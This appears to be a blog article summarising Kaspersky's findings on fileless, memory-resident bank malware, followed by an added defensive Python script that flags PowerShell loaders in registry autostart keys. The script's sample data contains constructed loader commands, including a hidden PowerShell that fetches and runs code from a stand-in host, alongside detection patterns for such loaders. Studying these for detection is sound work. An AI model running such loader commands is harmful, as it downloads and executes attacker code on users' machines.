Researchers from Kaspersky Lab have recently discovered a new “fileless malware” in the wild that is targeting banks and financial institutions globally and that, due to its nature, is proving incredibly difficult to identify and to recover forensically.
The new malware uses “Meterpreter”, an existing Metasploit penetration testing tool, to plant its payloads directly into a computer’s memory (RAM) rather than dropping them onto the file system as a file or series of files. The frustrating thing about this from a forensics perspective is that RAM is volatile: it needs a constant supply of electricity to maintain its state, so whenever a computer is switched off and power is no longer supplied to the memory modules, the data held in RAM is lost. This makes any kind of “dead box forensics” (i.e. switching off the machine and taking it to the lab for analysis) incredibly difficult.
Additionally, this new malware plants obfuscated PowerShell scripts directly into the Windows registry. These scripts are designed to load Meterpreter straight into the computer’s memory on startup, again leaving no further traces on the file system. This means the malware will run and start afresh each time you reboot your machine.
Lastly, the attackers use Windows NETSH, a command-line utility for modifying the network configuration of a running computer, either locally or over remote administration. The malware uses this utility to set up proxy connections in order to reach the malware’s command and control server.
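Because the in-memory stage leaves nothing on disk, the registry autostart entries described above are one of the few artefacts a defender can triage on a live or imaged system. The script below is an added example, not code from Kaspersky’s report or from the malware: it decodes PowerShell `-EncodedCommand` arguments (base64 over UTF-16LE, which is how PowerShell expects them) and scores each autostart value for the traits a memory-only loader tends to show, such as a hidden window, `Invoke-Expression` of generated text, base64 decoded at runtime, or a further blob read back out of the registry. The registry paths, value names and loader strings are constructed for illustration; the Run keys are assumed here as a typical autostart location, since the article does not name the key the malware used.

```python
"""Triage Windows autostart registry values for memory-only PowerShell loaders.

Added example, not taken from Kaspersky's report; the sample entries below are
constructed and do not reproduce any real infection's registry contents.
"""
import base64
import binascii
import re

# PowerShell accepts any unique prefix of -EncodedCommand; these are the
# spellings most often seen on command lines.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                        re.IGNORECASE)

# Traits of a loader that stages code in memory instead of on disk: (label, weight).
INDICATORS = {
    r"\bpowershell(?:\.exe)?\b": ("invokes PowerShell", 1),
    r"-w(?:indowstyle)?\s+hidden": ("hidden window", 2),
    r"-(?:ep|executionpolicy)\s+bypass": ("execution policy bypass", 2),
    r"\biex\b|invoke-expression": ("Invoke-Expression of generated text", 3),
    r"frombase64string": ("base64 blob decoded at runtime", 3),
    r"downloadstring|net\.webclient|invoke-webrequest": ("fetches code over the network", 3),
    r"get-itemproperty|hklm:|hkcu:": ("reads further payload from the registry", 3),
    r"virtualalloc|reflection\.assembly|\[system\.reflection": ("reflective in-memory loading", 4),
}


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or invalid."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def score_autorun(value: str):
    """Score one autostart value; returns (score, reasons, decoded_command_or_None)."""
    decoded = decode_encoded_command(value)
    # Search both the raw value and the decoded script so that indicators
    # hidden inside the base64 blob are still counted.
    text = value + ("\n" + decoded if decoded else "")
    score, reasons = 0, []
    if decoded is not None:
        score += 3
        reasons.append("encoded command line")
    for pattern, (label, weight) in INDICATORS.items():
        if re.search(pattern, text, re.IGNORECASE):
            score += weight
            reasons.append(label)
    return score, reasons, decoded


def triage(entries, threshold=4):
    """Return the (key, name, value) entries that meet the threshold, highest score first."""
    hits = []
    for key, name, value in entries:
        score, reasons, decoded = score_autorun(value)
        if score >= threshold:
            hits.append({"key": key, "name": name, "score": score,
                         "reasons": reasons, "decoded": decoded})
    return sorted(hits, key=lambda hit: hit["score"], reverse=True)


def _encode(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample autostart values: two benign entries and two loaders.
SAMPLE_AUTORUNS = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
    # Loader that pulls a second base64 blob out of a (constructed) registry value.
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     "powershell.exe -NoP -W Hidden -enc " + _encode(
         "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
         "(Get-ItemProperty 'HKLM:\\SOFTWARE\\Constructed\\Stage').blob)))")),
    # Loader that fetches its stage from a (constructed, non-routable) URL.
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Sync",
     "powershell -ep bypass -c \"iex (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/s')\""),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_AUTORUNS):
        print(f"{hit['score']:>2}  {hit['key']}\\{hit['name']}: {', '.join(hit['reasons'])}")
        if hit["decoded"]:
            print("    decoded:", hit["decoded"])
```

On a real host the `SAMPLE_AUTORUNS` list would be replaced by the output of `reg query` or `Get-ItemProperty` over the autostart locations, and a memory image or the live process list would be checked for the `powershell.exe` instance the entry spawns. The NETSH side of the article can be reviewed alongside this with netsh’s own `show` commands for its proxy settings; the article does not say which netsh proxy feature the malware used, so that mapping is an assumption here.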
In essence, initial research suggests the only sources of forensic evidence for such infections are the RAM, the network traffic and the Windows registry. All in all, not a lot to go on, unfortunately.
However, the research continues, so further findings should be released by Kaspersky in due course. In the meantime you can read further articles from The Hacker News and ComputerWorld Security, and also read the official Kaspersky report for more detailed information.